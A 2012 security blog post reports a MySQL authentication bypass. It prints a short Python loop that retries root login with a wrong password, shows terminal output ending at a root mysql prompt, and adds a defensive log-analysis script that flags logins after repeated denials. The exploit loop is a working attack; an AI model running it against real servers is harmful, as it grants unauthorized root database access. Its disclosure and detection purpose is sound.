June 24, 2012

Massive MYSQL Authentication Bypass Exploit

Written by David Kennedy
A new MySQL authentication bypass exploit has been released on seclists here: http://seclists.org/oss-sec/2012/q2/493. It is absolutely trivial to gain root access to a MySQL database at this point. Thanks to jduck for the tweet bringing this to our attention. Easy Python script to gain root access to MySQL:

#!/usr/bin/python
import subprocess

while 1: subprocess.Popen("mysql -u root mysql --password=blah",
         shell=True).wait()
Below is the output from running the command:

relik@stronghold:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
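A defensive counterpart to the loop above, added here as an example and not part of the original post: it flags a successful login that directly follows a run of denials for the same account, which is the pattern visible in the output above. The log line layout (general-query-log style), the function names and the threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Assumed line layout: "<timestamp>\t<conn id> Connect\t<detail>".
# The "Access denied" wording is the same message the client prints above.
DENIED = re.compile(r"Connect\s+Access denied for user '([^']*)'@'([^']*)'")
ALLOWED = re.compile(r"Connect\s+([^\s@]+)@(\S+) on\b")


def find_bypass_pattern(lines, threshold=5):
    """Return (user, host, failures) for every successful connect that
    directly follows at least `threshold` consecutive denials for the
    same user@host."""
    streak = defaultdict(int)  # (user, host) -> consecutive denied connects
    hits = []
    for line in lines:
        m = DENIED.search(line)
        if m:
            streak[m.groups()] += 1
            continue
        m = ALLOWED.search(line)
        if m:
            key = m.groups()
            if streak[key] >= threshold:
                hits.append((key[0], key[1], streak[key]))
            streak[key] = 0  # a success ends the streak either way
    return hits


def build_sample():
    """Constructed sample log, not taken from a real server."""
    denied = ("120624 10:00:%02d\t%d Connect\tAccess denied for user "
              "'root'@'localhost' (using password: YES)")
    lines = [denied % (i, 100 + i) for i in range(11)]
    lines.append("120624 10:00:11\t111 Connect\troot@localhost on mysql")
    # One mistyped password followed by a normal login must not alert.
    lines.append("120624 10:05:00\t112 Connect\tAccess denied for user "
                 "'app'@'10.0.0.5' (using password: YES)")
    lines.append("120624 10:05:04\t113 Connect\tapp@10.0.0.5 on shop")
    return lines


if __name__ == "__main__":
    for user, host, failures in find_bypass_pattern(build_sample()):
        print("ALERT: %s@%s logged in after %d consecutive denials"
              % (user, host, failures))
```

The threshold trades missed detections against alerts on ordinary typos, so tune it against normal login behaviour for the server in question.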